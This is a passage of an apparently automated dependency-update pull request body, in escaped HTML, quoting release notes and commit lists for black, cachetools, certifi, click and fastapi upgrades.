href=\"https://redirect.github.com/psf/black/issues/5139\"\u003e#5139\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCorrect the version in the published executables (\u003ca href=\"https://redirect.github.com/psf/black/issues/5137\"\u003e#5137\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Neovim integration guide covering conform.nvim, ALE, and simple command approaches\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/5124\"\u003e#5124\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 26.5.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for unpacking in comprehensions (PEP 798) and for lazy imports (PEP 810),\nboth new syntactic features in Python 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5048\"\u003e#5048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePython 3.15 is now supported. Compiled wheels are not yet provided for Python 3.15, so\nperformance may be slower than on existing Python versions. Wheels will be provided\nonce Python 3.15 is later in its release cycle. (\u003ca href=\"https://redirect.github.com/psf/black/issues/5127\"\u003e#5127\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix \u003ccode\u003e# fmt: skip\u003c/code\u003e being ignored in nested \u003ccode\u003eif\u003c/code\u003e expressions with parenthesized \u003ccode\u003ein\u003c/code\u003e\nclauses (\u003ca href=\"https://redirect.github.com/psf/black/issues/4903\"\u003e#4903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd syntactic support for Python 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5048\"\u003e#5048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix crash when an f-string follows a \u003ccode\u003e# fmt: off\u003c/code\u003e comment inside brackets (\u003ca href=\"https://redirect.github.com/psf/black/issues/5097\"\u003e#5097\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePreserve multiline compound statement headers when \u003ccode\u003e# fmt: skip\u003c/code\u003e is placed on the\ncolon line (\u003ca href=\"https://redirect.github.com/psf/black/issues/5117\"\u003e#5117\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImprove heuristics around whether blank lines should appear before, within and after\ngroups of same-name decorated functions (such as \u003ccode\u003e@overload\u003c/code\u003e groups) in \u003ccode\u003e.pyi\u003c/code\u003e stub\nfiles (\u003ca href=\"https://redirect.github.com/psf/black/issues/5021\"\u003e#5021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix blank lines being removed between a function and a decorated class in \u003ccode\u003e.pyi\u003c/code\u003e stub\nfiles (\u003ca href=\"https://redirect.github.com/psf/black/issues/5092\"\u003e#5092\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent string merger from creating unsplittable long lines when a pragma comment\n(e.g. \u003ccode\u003e# type: ignore\u003c/code\u003e) follows the closing bracket (\u003ca href=\"https://redirect.github.com/psf/black/issues/5096\"\u003e#5096\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRun CI on 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5127\"\u003e#5127\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/87928e6d6761a4a6d22250e1fee5601b3998086e\"\u003e\u003ccode\u003e87928e6\u003c/code\u003e\u003c/a\u003e Prepare release 26.5.1 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5140\"\u003e#5140\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/c970a49702488739add6c728122deb3a99900803\"\u003e\u003ccode\u003ec970a49\u003c/code\u003e\u003c/a\u003e Preserve comments before fmt: skip lines (\u003ca href=\"https://redirect.github.com/psf/black/issues/5139\"\u003e#5139\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/5809338fd5f92d50e80c2ad312292ae6d428a480\"\u003e\u003ccode\u003e5809338\u003c/code\u003e\u003c/a\u003e Preserve inline comments inside annotation subscripts (\u003ca href=\"https://redirect.github.com/psf/black/issues/5130\"\u003e#5130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/61361b71995f6ea44ce01915bacd3ecc50642507\"\u003e\u003ccode\u003e61361b7\u003c/code\u003e\u003c/a\u003e docs: add Neovim integration guide and fix http link (\u003ca href=\"https://redirect.github.com/psf/black/issues/5124\"\u003e#5124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/ebe6018e3254629788376e619207719fbe34a849\"\u003e\u003ccode\u003eebe6018\u003c/code\u003e\u003c/a\u003e CI Hotfixes (\u003ca href=\"https://redirect.github.com/psf/black/issues/5136\"\u003e#5136\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/9cbd95f80e97c1ab4d690d1d41b81579a13bf75c\"\u003e\u003ccode\u003e9cbd95f\u003c/code\u003e\u003c/a\u003e Fix publish binaries again on Windows (\u003ca href=\"https://redirect.github.com/psf/black/issues/5134\"\u003e#5134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/3dc8e6c41911bdaedb4bac8d633979c34a112b78\"\u003e\u003ccode\u003e3dc8e6c\u003c/code\u003e\u003c/a\u003e Add new changelog (\u003ca href=\"https://redirect.github.com/psf/black/issues/5132\"\u003e#5132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/6d0fff0d5a965b9d0d3dbd7c5738d835fd574130\"\u003e\u003ccode\u003e6d0fff0\u003c/code\u003e\u003c/a\u003e Fix publish binaries workflow (\u003ca href=\"https://redirect.github.com/psf/black/issues/5133\"\u003e#5133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/d2490e24dad33b8f68c77602ee29160de0fea24b\"\u003e\u003ccode\u003ed2490e2\u003c/code\u003e\u003c/a\u003e Prepare release 26.5.0 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5131\"\u003e#5131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/2b13ea76fa69d4923381df65deb1a5c896ca27ad\"\u003e\u003ccode\u003e2b13ea7\u003c/code\u003e\u003c/a\u003e Preserve multiline headers with fmt skip (\u003ca href=\"https://redirect.github.com/psf/black/issues/5117\"\u003e#5117\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/black/compare/26.3.1...26.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cachetools` from 7.1.1 to 7.1.4\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/tkem/cachetools/blob/master/CHANGELOG.rst\"\u003ecachetools's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ev7.1.4 (2026-05-22)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor unit test improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.3 (2026-05-18)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor type stub improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.2 (2026-05-16)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor type stub improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMinor documentation improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eModernize build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/48284d73d0a8834c9c50f8d41bb99e6f93b2dfed\"\u003e\u003ccode\u003e48284d7\u003c/code\u003e\u003c/a\u003e Release v7.1.4.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/55ea96b88a485fca9effae0f838186274f00897c\"\u003e\u003ccode\u003e55ea96b\u003c/code\u003e\u003c/a\u003e Update build environment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/c5439fe5dc883220b59469e450dbcbf9f4c2e52d\"\u003e\u003ccode\u003ec5439fe\u003c/code\u003e\u003c/a\u003e Add threading tests for lock-only decorators.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/91828fccd629d426157a165d38563614ba06a875\"\u003e\u003ccode\u003e91828fc\u003c/code\u003e\u003c/a\u003e Run threading tests unconditionally with timeout.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/16952edb1eb2d2ced7601e12db722008e5156912\"\u003e\u003ccode\u003e16952ed\u003c/code\u003e\u003c/a\u003e Release v7.1.3.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/92dd756b93813d1ddfe70893e9c219342a52e19a\"\u003e\u003ccode\u003e92dd756\u003c/code\u003e\u003c/a\u003e Prepare v7.1.3.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/ced08f52ef792a010b8171715c7842da4e11b9ac\"\u003e\u003ccode\u003eced08f5\u003c/code\u003e\u003c/a\u003e Improve cachetools.func type stubs.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/d809d7be5a222effd3663c33baaaee3802972daa\"\u003e\u003ccode\u003ed809d7b\u003c/code\u003e\u003c/a\u003e Update build environment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/c84b5e5be3d33a32d33f0988b524fb86de1e44f2\"\u003e\u003ccode\u003ec84b5e5\u003c/code\u003e\u003c/a\u003e Release v7.1.2.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/39ad61c1db56600fe903f3c4216996c491e775bf\"\u003e\u003ccode\u003e39ad61c\u003c/code\u003e\u003c/a\u003e Prepare v7.1.2.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/tkem/cachetools/compare/v7.1.1...v7.1.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2026.4.22 to 2026.5.20\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/d7ea151afc2ce6bef0555b9349902bd867e928dd\"\u003e\u003ccode\u003ed7ea151\u003c/code\u003e\u003c/a\u003e 2026.05.20 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/413\"\u003e#413\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2026.04.22...2026.05.20\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `click` from 8.3.3 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/releases\"\u003eclick's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.4.1\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.1 fix release, which fixes bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.1/\"\u003ehttps://pypi.org/project/click/8.4.1/\u003c/a\u003e\nChanges: \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-1\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-1\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/click/milestone/32?closed=1\"\u003ehttps://github.com/pallets/click/milestone/32?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type conversion again. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3458\"\u003e#3458\u003c/a\u003e \u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3277\"\u003e#3277\u003c/a\u003e # 3466\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eChoice\u003c/code\u003e \u003ccode\u003eEnum\u003c/code\u003e values produces a valid completion result. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3015\"\u003e#3015\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3487\"\u003e#3487\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3449\"\u003e#3449\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.4.0\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.0 feature release. A feature release may include new features, remove previously deprecated code, add new deprecation, or introduce potentially breaking changes.\u003c/p\u003e\n\u003cp\u003eWe encourage everyone to upgrade. You can read more about our \u003ca href=\"https://palletsprojects.com/versions\"\u003eVersion Support Policy\u003c/a\u003e on our website.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.0/\"\u003ehttps://pypi.org/project/click/8.4.0/\u003c/a\u003e\nChanges:  \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-0\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-0\u003c/a\u003e\nMilestone \u003ca href=\"https://github.com/pallets/click/milestone/30\"\u003ehttps://github.com/pallets/click/milestone/30\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParamType\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3371\"\u003e#3371\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for :class:\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n:class:\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n:class:\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add :func:\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n\u003ca href=\"https://redirect.github.com/pallets/click/issues/3372\"\u003e#3372\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParameter\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/2805\"\u003e#2805\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e:attr:\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of :meth:\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor :class:\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/blob/main/CHANGES.rst\"\u003eclick's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 8.4.1\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type\nconversion again. :issue:\u003ccode\u003e3458\u003c/code\u003e :issue:\u003ccode\u003e3484\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. :issue:\u003ccode\u003e3277\u003c/code\u003e :pr:\u003ccode\u003e3466\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eChoice\u003c/code\u003e \u003ccode\u003eEnum\u003c/code\u003e values produces a valid completion\nresult. :issue:\u003ccode\u003e3015\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. :issue:\u003ccode\u003e3487\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. :issue:\u003ccode\u003e3449\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 8.4.0\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-17\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e typing improvements. :pr:\u003ccode\u003e3371\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for :class:\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n:class:\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n:class:\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add :func:\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n:pr:\u003ccode\u003e3372\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e typing improvements. :pr:\u003ccode\u003e2805\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e:attr:\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of :meth:\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor :class:\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\n:issue:\u003ccode\u003e2745\u003c/code\u003e :pr:\u003ccode\u003e3364\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAuto-detect \u003ccode\u003etype=UNPROCESSED\u003c/code\u003e for \u003ccode\u003eflag_value\u003c/code\u003e of non-basic types\n(not \u003ccode\u003estr\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e, \u003ccode\u003efloat\u003c/code\u003e, or \u003ccode\u003ebool\u003c/code\u003e), so programmer-provided\nPython objects like classes and enum members are passed through unchanged\ninstead of being stringified. Previously \u003ccode\u003etype=click.UNPROCESSED\u003c/code\u003e had\nto be set explicitly. :issue:\u003ccode\u003e2012\u003c/code\u003e :pr:\u003ccode\u003e3363\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6eeb50e948ea136db145280f6f5dd52eca3fa7e5\"\u003e\u003ccode\u003e6eeb50e\u003c/code\u003e\u003c/a\u003e release version 8.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/67921d5b71584112eebcbf89596b5f0e6d14c49f\"\u003e\u003ccode\u003e67921d5\u003c/code\u003e\u003c/a\u003e change log and doc fixes (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3495\"\u003e#3495\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/9c41f46a4015700489ad009266edf1f3893d01d1\"\u003e\u003ccode\u003e9c41f46\u003c/code\u003e\u003c/a\u003e Fix changelog and version admonitions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6cb34774f20598aa288332f8da02c5aee85448a6\"\u003e\u003ccode\u003e6cb3477\u003c/code\u003e\u003c/a\u003e fix skip condition\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/5ee8e3123d8ddece6c47eff9a7a7d4ca478c4f37\"\u003e\u003ccode\u003e5ee8e31\u003c/code\u003e\u003c/a\u003e fix I/O operation on closed file error with CliRunner and echo_via_pager (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3482\"\u003e#3482\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/becbde5cf416441627f779e8dd34e57738ee1c1f\"\u003e\u003ccode\u003ebecbde5\u003c/code\u003e\u003c/a\u003e pager doesn't close std streams\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/a5f5aa6d4012d256ccca24638f2642fc371e9f77\"\u003e\u003ccode\u003ea5f5aa6\u003c/code\u003e\u003c/a\u003e Handle empty bytes in echo (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3493\"\u003e#3493\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/4d3db84b251518e97299a38a5ca4bab3d01873a2\"\u003e\u003ccode\u003e4d3db84\u003c/code\u003e\u003c/a\u003e handle empty bytes in echo\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/d42f15b71757de791a5781fb179fd972da9169f5\"\u003e\u003ccode\u003ed42f15b\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eget_parameter_source()\u003c/code\u003e during type conversion and eager callbacks (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/0baa8db07736fc7ad3d3eed97d4c73b0059c63e1\"\u003e\u003ccode\u003e0baa8db\u003c/code\u003e\u003c/a\u003e Document ctx.params bypass with test and doc\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/click/compare/8.3.3...8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fastapi` from 0.136.1 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 